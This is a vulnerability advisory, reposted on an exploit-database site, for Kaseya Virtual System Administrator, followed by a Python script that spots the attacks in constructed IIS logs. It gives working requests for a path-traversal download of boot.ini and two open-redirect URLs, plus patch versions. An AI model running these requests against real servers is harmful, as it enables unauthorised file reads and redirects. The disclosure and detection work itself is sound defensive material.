0day.today - Biggest Exploit Database in the World.
Kaseya Virtual System Administrator File Download / Open Redirect Vulnerabilities
Two vulns in Kaseya Virtual System Administrator - an authenticated arbitrary file download and two lame open redirects. Full advisory text below and at [1]. Thanks to CERT for helping me to disclose these vulnerabilities [2].

>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 13/07/2015

>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show."

>> Technical details:

#1
Vulnerability: Arbitrary file download (authenticated)
Affected versions: unknown, at least v9

GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/

A valid login is needed, and the Referer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\).

#2
Vulnerability: Open redirect (unauthenticated)
Affected versions: unknown, at least v7 to XXX

a) http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com

b) GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
Host: www.google.com
(host header has to be spoofed to the target)

>> Fix:
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29

# 0day.today [2024-11-15] #
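Detection logic for the two issues above, as an added example that is not part of the advisory or of Kaseya's own code: it scans IIS-style W3C log lines for Downloader.ashx requests whose filepath parameter walks out of the WebPages root, and for supportLoad.asp / LocalProxy.ashx requests whose urlToLoad / url parameter points off-host. The log lines, field layout and local host address are constructed for the example.

```python
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample IIS W3C log lines (not from the advisory). Field order assumed:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(Referer) sc-status
SAMPLE_LOG = """\
2015-07-13 10:00:01 10.0.0.3 GET /vsaPres/web20/core/Downloader.ashx displayName=whatever&filepath=../../boot.ini 80 admin 10.0.0.9 http://10.0.0.3/ 200
2015-07-13 10:00:05 10.0.0.3 GET /vsaPres/web20/core/Downloader.ashx displayName=report.pdf&filepath=tickets/1234/report.pdf 80 admin 10.0.0.9 http://10.0.0.3/ 200
2015-07-13 10:01:10 10.0.0.3 GET /inc/supportLoad.asp urlToLoad=http://www.google.com 80 - 10.0.0.9 - 302
2015-07-13 10:02:00 10.0.0.3 GET /vsaPres/Web20/core/LocalProxy.ashx url=http%3A%2F%2Fwww.google.com 80 - 10.0.0.9 - 200
2015-07-13 10:03:00 10.0.0.3 GET /inc/supportLoad.asp urlToLoad=/support/help.asp 80 - 10.0.0.9 - 200
"""


def has_traversal(value: str) -> bool:
    """True if any path segment is '..' after decoding (twice, to catch double encoding)."""
    for _ in range(2):
        value = unquote(value)
    return ".." in value.replace("\\", "/").split("/")


def is_external_url(value: str, local_host: str) -> bool:
    """True if the URL resolves to a host other than local_host (catches '//host' forms too)."""
    parsed = urlparse(unquote(value).replace("\\", "/"))
    return bool(parsed.netloc) and parsed.netloc.lower() != local_host.lower()


def classify(line: str, local_host: str = "10.0.0.3"):
    """Return a finding label for one log line, or None if it looks benign."""
    parts = line.split()
    if len(parts) < 11:
        return None
    stem, query = parts[4].lower(), parts[5]
    params = parse_qs(query, keep_blank_values=True)  # decodes %XX once, like IIS does
    if stem.endswith("/downloader.ashx"):
        if any(has_traversal(fp) for fp in params.get("filepath", [])):
            return "file-download-traversal"
    if stem.endswith("/supportload.asp") or stem.endswith("/localproxy.ashx"):
        for key in ("urlToLoad", "url"):
            if any(is_external_url(u, local_host) for u in params.get(key, [])):
                return "open-redirect"
    return None


def scan(log_text: str, local_host: str = "10.0.0.3"):
    """Return (line_number, label) for every line that matches a known pattern."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), 1):
        label = classify(line, local_host)
        if label:
            findings.append((number, label))
    return findings
```

Run against the embedded sample, scan() flags line 1 (traversal) and lines 3 and 4 (off-host redirects) while leaving the legitimate ticket download and the relative urlToLoad alone.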